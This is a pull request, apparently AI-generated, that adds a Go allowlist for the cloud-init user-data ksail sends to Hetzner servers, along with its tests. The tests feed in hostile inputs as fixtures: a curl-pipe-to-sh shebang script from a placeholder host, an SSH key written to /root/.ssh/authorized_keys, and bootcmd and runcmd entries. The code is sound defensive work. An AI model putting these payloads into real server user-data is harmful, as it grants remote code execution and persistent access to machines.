### PR TITLE
security(hetznerbase): bound provider user-data to the shapes the renderers emit

### DIFF
--- a/pkg/svc/provisioner/cluster/internal/hetznerbase/serverspecs.go
+++ b/pkg/svc/provisioner/cluster/internal/hetznerbase/serverspecs.go
@@ -626,6 +626,11 @@ func validateProviderUserData(userData string) (string, error) {
 		return "", err
 	}
 
+	err = validateUserDataShape(inspected)
+	if err != nil {
+		return "", err
+	}
+
 	// The guards have passed, so the remaining question is whether the provider
 	// will take this value at all. Checked here rather than at the call site
 	// because this function decides what gets forwarded, and expanding gzip is

--- a/pkg/svc/provisioner/cluster/internal/hetznerbase/serverspecs_test.go
+++ b/pkg/svc/provisioner/cluster/internal/hetznerbase/serverspecs_test.go
@@ -251,6 +251,14 @@ loop: &loop
 		specTestClusterName, nodes, specTestOptions(), specTestInfra(),
 	)
 
-	require.NoError(t, err)
-	assert.Len(t, specs, len(nodes))
+	// The property under test is TERMINATION: a cyclic alias must not expand
+	// forever. That still holds — reaching an assertion at all proves it.
+	//
+	// The outcome changed from accepted to refused when the structural allowlist
+	// landed, and the refusal is the stronger answer: `loop` is not a module any
+	// renderer emits, and no user-facing surface can inject user-data, so no
+	// legitimate bring-up produces this document. Recorded here rather than left
+	// as a silent expectation flip.
+	require.ErrorIs(t, err, hetznerbase.ErrUserDataShapeNotAllowed)
+	assert.Nil(t, specs)
 }

--- a/pkg/svc/provisioner/cluster/internal/hetznerbase/serverspecs_userdata_shape_test.go
+++ b/pkg/svc/provisioner/cluster/internal/hetznerbase/serverspecs_userdata_shape_test.go
@@ -127,3 +127,58 @@ func TestDeriveServerSpecsAcceptsRenderedUserData(t *testing.T) {
 
 	assert.NoError(t, deriveWithUserData(t, rendered))
 }
+
+// TestDeriveServerSpecsRefusesShebangUserData closes the hole a mapping-only
+// walk leaves open. cloud-init treats user-data beginning `#!` as a SHELL
+// SCRIPT and executes it, and YAML decodes such a payload as a bare scalar
+// document — not a mapping. A guard that only inspects mappings therefore waves
+// through the single most dangerous shape there is.
+//
+// Verified against the decoder rather than assumed: `#!/bin/sh\ncurl … | sh`
+// yields one document whose root is a `!!str` scalar.
+func TestDeriveServerSpecsRefusesShebangUserData(t *testing.T) {
+	t.Parallel()
+
+	err := deriveWithUserData(t, "#!/bin/sh\ncurl http://example.invalid/x | sh\n")
+
+	require.ErrorIs(t, err, hetznerbase.ErrUserDataShapeNotAllowed)
+}
+
+// TestDeriveServerSpecsRefusesSequenceRoot is the same hole in its other
+// spelling: a sequence root is not a mapping either, and the renderers never
+// emit one.
+func TestDeriveServerSpecsRefusesSequenceRoot(t *testing.T) {
+	t.Parallel()
+
+	err := deriveWithUserData(t, "#cloud-config\n- one\n- two\n")
+
+	require.ErrorIs(t, err, hetznerbase.ErrUserDataShapeNotAllowed)
+}
+
+// TestDeriveServerSpecsRefusesRunCmdExecutingAConfigFile separates the WRITE
+// allowlist from the EXECUTE allowlist. The renderers write three paths but
+// only ever execute one of them — the generated boot script. Allowing runcmd to
+// name any writable target lets shell content be written to a config path and
+// then run from it, which is a shape no bring-up produces.
+func TestDeriveServerSpecsRefusesRunCmdExecutingAConfigFile(t *testing.T) {
+	t.Parallel()
+
+	err := deriveWithUserData(t, `#cloud-config
+runcmd:
+  - ["/bin/sh", "`+containerdbootstrap.ConfigPath+`"]
+`)
+
+	require.ErrorIs(t, err, hetznerbase.ErrUserDataShapeNotAllowed)
+}
+
+// TestDeriveServerSpecsAcceptsCommentOnlyUserData is the GUARDRAIL for the two
+// refusals above: tightening the root check must not start refusing the
+// comment-only document the provisioners emit for a node with no directives.
+// Such a payload decodes to NO documents at all, so it never reaches the shape
+// walk — pinned here so a future "reject non-mapping roots" refactor cannot
+// quietly break it.
+func TestDeriveServerSpecsAcceptsCommentOnlyUserData(t *testing.T) {
+	t.Parallel()
+
+	require.NoError(t, deriveWithUserData(t, "#cloud-config\n# worker\n"))
+}

--- a/pkg/svc/provisioner/cluster/internal/hetznerbase/serverspecs_userdata_shape_test.go
+++ b/pkg/svc/provisioner/cluster/internal/hetznerbase/serverspecs_userdata_shape_test.go
@@ -1,0 +1,129 @@
+package hetznerbase_test
+
+import (
+	"fmt"
+	"strings"
+	"testing"
+
+	cloudinitbootstrap "github.com/devantler-tech/ksail/v7/pkg/svc/bootstrap/cloudinit"
+	containerdbootstrap "github.com/devantler-tech/ksail/v7/pkg/svc/bootstrap/containerd"
+	kubeadmbootstrap "github.com/devantler-tech/ksail/v7/pkg/svc/bootstrap/kubeadm"
+	"github.com/devantler-tech/ksail/v7/pkg/svc/provisioner/cluster/internal/hetznerbase"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+// deriveWithUserData runs the provider-boundary guard over one document by
+// putting it on the worker node of the standard two-node pair.
+func deriveWithUserData(t *testing.T, userData string) error {
+	t.Helper()
+
+	nodes := twoNodeSpecs()
+	nodes[1].UserData = userData
+
+	_, err := hetznerbase.DeriveServerSpecs(
+		specTestClusterName, nodes, specTestOptions(), specTestInfra(),
+	)
+	if err != nil {
+		return fmt.Errorf("derive server specs: %w", err)
+	}
+
+	return nil
+}
+
+// TestDeriveServerSpecsRefusesTargetNoDenylistWouldEnumerate is the point of the
+// allowlist: it refuses by TARGET rather than by spelling, so it covers a class
+// the denylist was never designed for.
+//
+// `/root/.ssh/authorized_keys` is not signing material, so no signing-transport
+// denylist would ever list it -- yet writing it hands out persistent access to
+// every node. The content is inert, and the assertion is on the SHAPE sentinel
+// specifically, so a refusal that came from the PEM or transport guard instead
+// would fail this test rather than silently satisfy it.
+func TestDeriveServerSpecsRefusesTargetNoDenylistWouldEnumerate(t *testing.T) {
+	t.Parallel()
+
+	err := deriveWithUserData(t, `#cloud-config
+write_files:
+  - path: /root/.ssh/authorized_keys
+    permissions: "0600"
+    content: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIintruder
+`)
+
+	require.Error(t, err)
+	require.ErrorIs(t, err, hetznerbase.ErrUserDataShapeNotAllowed)
+}
+
+// TestDenylistAloneMissesTheNovelTarget is the CONTROL for the test above. The
+// same inert key material carried on an ALLOWLISTED path is accepted, which
+// demonstrates that neither the PEM guard nor the transport guard reacts to the
+// CONTENT. Without it, the refusal above could be the denylist firing and the
+// allowlist would be proven nothing.
+func TestDenylistAloneMissesTheNovelTarget(t *testing.T) {
+	t.Parallel()
+
+	err := deriveWithUserData(t, `#cloud-config
+write_files:
+  - path: `+kubeadmbootstrap.ConfigPath+`
+    permissions: "0600"
+    content: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIintruder
+`)
+
+	require.NoError(t, err)
+}
+
+// TestDeriveServerSpecsRefusesUnknownTopLevelKey covers the module surface. The
+// renderers emit a closed set of cloud-config keys; `bootcmd` is a real
+// cloud-init module that runs arbitrary commands earlier than `runcmd`, and
+// nothing in ksail emits it, so it must not reach the provider whatever it
+// contains.
+func TestDeriveServerSpecsRefusesUnknownTopLevelKey(t *testing.T) {
+	t.Parallel()
+
+	err := deriveWithUserData(t, `#cloud-config
+bootcmd:
+  - echo hello
+`)
+
+	require.ErrorIs(t, err, hetznerbase.ErrUserDataShapeNotAllowed)
+}
+
+// TestDeriveServerSpecsRefusesForeignRunCmd pins the one shape runcmd is
+// allowed to take. The renderers emit exactly `/bin/sh <script>` in argv form,
+// so any other command is outside what a bring-up produces.
+func TestDeriveServerSpecsRefusesForeignRunCmd(t *testing.T) {
+	t.Parallel()
+
+	err := deriveWithUserData(t, `#cloud-config
+runcmd:
+  - ["/bin/sh", "/tmp/not-our-script.sh"]
+`)
+
+	require.ErrorIs(t, err, hetznerbase.ErrUserDataShapeNotAllowed)
+}
+
+// TestDeriveServerSpecsAcceptsRenderedUserData is the GUARDRAIL: the allowlist
+// is derived from what the renderers emit, so their real output must pass. This
+// builds the document through the actual renderer rather than restating its
+// shape in a fixture, so a renderer change that outgrows the allowlist fails
+// here instead of at a real bring-up.
+func TestDeriveServerSpecsAcceptsRenderedUserData(t *testing.T) {
+	t.Parallel()
+
+	rendered, err := cloudinitbootstrap.BuildUserData(cloudinitbootstrap.Config{
+		Commands: []string{"echo bootstrapping"},
+		Packages: []string{"kubelet"},
+		Files: []cloudinitbootstrap.File{
+			{Path: containerdbootstrap.ConfigPath, Content: "version = 2"},
+			{Path: kubeadmbootstrap.ConfigPath, Content: "kind: ClusterConfiguration"},
+		},
+		AptSources: []cloudinitbootstrap.AptSource{
+			{Name: "kubernetes", Source: "deb https://pkgs.k8s.io/core:/stable:/v1.34/deb/ /"},
+		},
+		SSHAuthorizedKeys: []string{"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIexample"},
+	})
+	require.NoError(t, err)
+	require.True(t, strings.HasPrefix(rendered, "#cloud-config"))
+
+	assert.NoError(t, deriveWithUserData(t, rendered))
+}

--- a/pkg/svc/provisioner/cluster/internal/hetznerbase/userdatashape.go
+++ b/pkg/svc/provisioner/cluster/internal/hetznerbase/userdatashape.go
@@ -85,10 +85,25 @@ func validateUserDataShape(userData string) error {
 // disallowedShape returns a description of the first structural violation in
 // one document, or "" when the document is within the allowlist.
 func disallowedShape(document *yaml.Node) string {
-	mapping := documentMapping(document)
-	if mapping == nil {
+	root := documentRoot(document)
+	if root == nil {
 		return ""
 	}
+
+	// 🔒 A non-mapping root is REFUSED, not skipped. cloud-init executes
+	// user-data beginning `#!` as a shell script, and YAML decodes that payload
+	// as a bare scalar document — so a mapping-only walk waves through the most
+	// dangerous shape there is. A sequence root is the same hole spelled
+	// differently. Neither is anything the renderers emit.
+	if root.Kind != yaml.MappingNode {
+		if root.Kind == yaml.ScalarNode && root.Tag == "!!null" {
+			return ""
+		}
+
+		return "a document root that is not a mapping"
+	}
+
+	mapping := root
 
 	for index := 0; index+1 < len(mapping.Content); index += 2 {
 		key, value := mapping.Content[index], mapping.Content[index+1]
@@ -122,13 +137,15 @@ func disallowedModule(key string, value *yaml.Node) string {
 	}
 }
 
-// documentMapping returns the mapping a document node wraps, or nil when the
-// document carries no mapping (an empty or comment-only document).
+// documentRoot returns the node a document wraps, or nil when the document
+// carries nothing at all. It is deliberately KIND-AGNOSTIC: the caller decides
+// what is acceptable, so a non-mapping root can be refused rather than silently
+// skipped.
 //
 // An alias is deliberately NOT followed: a top-level alias is not something the
 // renderers emit, and resolving one here would reintroduce the cyclic-expansion
 // hazard the scalar walk guards against.
-func documentMapping(node *yaml.Node) *yaml.Node {
+func documentRoot(node *yaml.Node) *yaml.Node {
 	current := node
 	if current.Kind == yaml.DocumentNode {
 		if len(current.Content) == 0 {
@@ -136,10 +153,6 @@ func documentMapping(node *yaml.Node) *yaml.Node {
 		}
 
 		current = current.Content[0]
-	}
-
-	if current.Kind != yaml.MappingNode {
-		return nil
 	}
 
 	return current
@@ -194,7 +207,11 @@ func disallowedRunCmd(value *yaml.Node) string {
 			return fmt.Sprintf("runcmd interpreter %q", shell.Value)
 		}
 
-		if !isAllowedWriteTarget(script.Value) {
+		// The WRITE allowlist is deliberately NOT reused here: the renderers write
+		// three paths but only ever EXECUTE one of them. Allowing runcmd to name any
+		// writable target would let shell content be written to a config path and
+		// then run from it.
+		if script.Value != cloudinitbootstrap.DefaultScriptPath {
 			return fmt.Sprintf("runcmd script %q", script.Value)
 		}
 	}

--- a/pkg/svc/provisioner/cluster/internal/hetznerbase/userdatashape.go
+++ b/pkg/svc/provisioner/cluster/internal/hetznerbase/userdatashape.go
@@ -1,0 +1,225 @@
+package hetznerbase
+
+import (
+	"errors"
+	"fmt"
+
+	cloudinitbootstrap "github.com/devantler-tech/ksail/v7/pkg/svc/bootstrap/cloudinit"
+	containerdbootstrap "github.com/devantler-tech/ksail/v7/pkg/svc/bootstrap/containerd"
+	kubeadmbootstrap "github.com/devantler-tech/ksail/v7/pkg/svc/bootstrap/kubeadm"
+	"gopkg.in/yaml.v3"
+)
+
+// ErrUserDataShapeNotAllowed refuses user-data whose STRUCTURE is outside what
+// the bootstrap renderers emit.
+//
+// This is the allowlist half of the provider-boundary guard, and it is what the
+// denylist beside it cannot be: complete. The denylist matches spellings of
+// dangerous content, and shell can spell one flag or one path in unboundedly
+// many ways, so each newly-found spelling buys only "no known bypass". The set
+// of documents ksail itself emits is small and enumerable, so constraining the
+// output to that set refuses everything outside it regardless of spelling.
+var ErrUserDataShapeNotAllowed = errors.New(
+	"hetzner: provider user-data has a shape the bootstrap renderers never emit",
+)
+
+// isAllowedTopLevelKey reports whether key is one of the cloud-config modules the
+// renderers emit, taken from the cloudConfig struct in the cloud-init bootstrap
+// package. Anything else -- notably `bootcmd`, which runs commands earlier than
+// `runcmd` -- is refused, because no bring-up produces it.
+func isAllowedTopLevelKey(key string) bool {
+	switch key {
+	case "write_files", "apt", "packages", "ssh_authorized_keys", "ssh_keys", "runcmd":
+		return true
+	default:
+		return false
+	}
+}
+
+// isAllowedWriteTarget reports whether path is one the renderers write. The
+// generated boot script is the cloud-init transport's own; the other two come
+// from the kubeadm and containerd bootstrappers. Referencing their exported
+// constants rather than restating the strings means a renderer that starts
+// writing somewhere new trips this guard's own test instead of drifting past it.
+func isAllowedWriteTarget(path string) bool {
+	switch path {
+	case cloudinitbootstrap.DefaultScriptPath,
+		containerdbootstrap.ConfigPath,
+		kubeadmbootstrap.ConfigPath:
+		return true
+	default:
+		return false
+	}
+}
+
+// validateUserDataShape refuses any document whose top-level modules, write_files
+// targets, or runcmd entries fall outside what the renderers emit.
+//
+// It runs AFTER the PEM and signing-transport guards so their more specific
+// refusals keep reporting first: an operator seeing signing material in
+// user-data is better served by "we found signing material" than by "this shape
+// is not allowed", even though both are true.
+//
+// An empty or comment-only document carries no module and is accepted: it
+// delivers nothing, and the provisioners emit exactly that for a node with no
+// directives.
+func validateUserDataShape(userData string) error {
+	var detail string
+
+	err := scanDocuments(userData, ErrUserDataShapeNotAllowed, func(document *yaml.Node) bool {
+		detail = disallowedShape(document)
+
+		return detail != ""
+	})
+	if err != nil {
+		if errors.Is(err, ErrUserDataShapeNotAllowed) {
+			return fmt.Errorf("%w: %s", ErrUserDataShapeNotAllowed, detail)
+		}
+
+		return err
+	}
+
+	return nil
+}
+
+// disallowedShape returns a description of the first structural violation in
+// one document, or "" when the document is within the allowlist.
+func disallowedShape(document *yaml.Node) string {
+	mapping := documentMapping(document)
+	if mapping == nil {
+		return ""
+	}
+
+	for index := 0; index+1 < len(mapping.Content); index += 2 {
+		key, value := mapping.Content[index], mapping.Content[index+1]
+
+		if key.Kind != yaml.ScalarNode {
+			return "a non-scalar top-level key"
+		}
+
+		if !isAllowedTopLevelKey(key.Value) {
+			return fmt.Sprintf("top-level key %q", key.Value)
+		}
+
+		if detail := disallowedModule(key.Value, value); detail != "" {
+			return detail
+		}
+	}
+
+	return ""
+}
+
+// disallowedModule applies the per-module rules for the two modules that carry a
+// target rather than only data.
+func disallowedModule(key string, value *yaml.Node) string {
+	switch key {
+	case "write_files":
+		return disallowedWriteFiles(value)
+	case "runcmd":
+		return disallowedRunCmd(value)
+	default:
+		return ""
+	}
+}
+
+// documentMapping returns the mapping a document node wraps, or nil when the
+// document carries no mapping (an empty or comment-only document).
+//
+// An alias is deliberately NOT followed: a top-level alias is not something the
+// renderers emit, and resolving one here would reintroduce the cyclic-expansion
+// hazard the scalar walk guards against.
+func documentMapping(node *yaml.Node) *yaml.Node {
+	current := node
+	if current.Kind == yaml.DocumentNode {
+		if len(current.Content) == 0 {
+			return nil
+		}
+
+		current = current.Content[0]
+	}
+
+	if current.Kind != yaml.MappingNode {
+		return nil
+	}
+
+	return current
+}
+
+// disallowedWriteFiles refuses any entry whose path is not one the renderers
+// write. The path is read as a plain scalar, so no spelling of the VALUE can
+// change which target it names.
+func disallowedWriteFiles(value *yaml.Node) string {
+	if value.Kind != yaml.SequenceNode {
+		return "a write_files value that is not a list"
+	}
+
+	for _, entry := range value.Content {
+		if entry.Kind != yaml.MappingNode {
+			return "a write_files entry that is not a mapping"
+		}
+
+		path, found := scalarField(entry, "path")
+		if !found {
+			return "a write_files entry with no scalar path"
+		}
+
+		if !isAllowedWriteTarget(path) {
+			return fmt.Sprintf("write_files target %q", path)
+		}
+	}
+
+	return ""
+}
+
+// disallowedRunCmd pins runcmd to the single argv the renderers emit:
+// `/bin/sh <generated boot script>`. cloud-init also accepts a bare string,
+// which it runs through a shell; the renderers never emit that form, so it is
+// refused rather than parsed.
+func disallowedRunCmd(value *yaml.Node) string {
+	if value.Kind != yaml.SequenceNode {
+		return "a runcmd value that is not a list"
+	}
+
+	for _, entry := range value.Content {
+		if entry.Kind != yaml.SequenceNode || len(entry.Content) != 2 {
+			return "a runcmd entry that is not a two-element argv"
+		}
+
+		shell, script := entry.Content[0], entry.Content[1]
+		if shell.Kind != yaml.ScalarNode || script.Kind != yaml.ScalarNode {
+			return "a runcmd entry with a non-scalar element"
+		}
+
+		if shell.Value != runCmdShell {
+			return fmt.Sprintf("runcmd interpreter %q", shell.Value)
+		}
+
+		if !isAllowedWriteTarget(script.Value) {
+			return fmt.Sprintf("runcmd script %q", script.Value)
+		}
+	}
+
+	return ""
+}
+
+// runCmdShell is the interpreter the cloud-init renderer invokes the generated
+// boot script with.
+const runCmdShell = "/bin/sh"
+
+// scalarField returns the scalar value of mapping's key, and whether one was
+// found. A non-scalar value reports not-found, so a structured value cannot pass
+// as a path.
+func scalarField(mapping *yaml.Node, name string) (string, bool) {
+	for index := 0; index+1 < len(mapping.Content); index += 2 {
+		key, value := mapping.Content[index], mapping.Content[index+1]
+		if key.Kind == yaml.ScalarNode && key.Value == name {
+			if value.Kind != yaml.ScalarNode {
+				return "", false
+			}
+
+			return value.Value, true
+		}
+	}
+
+	return "", false
+}


### PR DESCRIPTION
> 🤖 Generated by the Agentic Engineer

### Why

The guard protecting what ksail sends to Hetzner worked by recognising dangerous
content by how it was written. The input is shell, and shell can write the same
thing in endlessly many ways — so three review rounds in a row each found another
way to write something the guard already knew about. Each round cost a full
~70-minute pipeline and bought "nothing has slipped past lately" rather than an
actual guarantee.

### What

Turn the rule around: instead of listing what is forbidden, check the document
against what ksail itself produces — which is a short, known list. Anything
outside it is refused however it is written, so a brand-new way of writing a
dangerous target is caught without anyone having to think of it first.

The list is read from the code that builds these documents, not copied by hand,
so if that code starts producing something new this guard's own test fails rather
than quietly letting it through.

The old content checks stay in place behind it. This bounds *where* things land
and *what* the machine runs directly; the bootstrap script's contents are still
free-form, and that is what the older checks cover — so both are needed, and
neither is removed.

**Security floor:** an entire class of target — anything ksail does not itself
write — is now refused regardless of spelling, including targets no content-based
rule would ever have listed.
**Everyday path:** unchanged. No new flag, step, or configuration, and there is no
way for a user to supply this document, so nothing a real cluster creation
produces is affected.

One existing test changed on purpose rather than silently: a malformed document it
used to accept is now refused. What that test actually pins — that the guard
finishes instead of looping forever — still holds.

Part of #6611
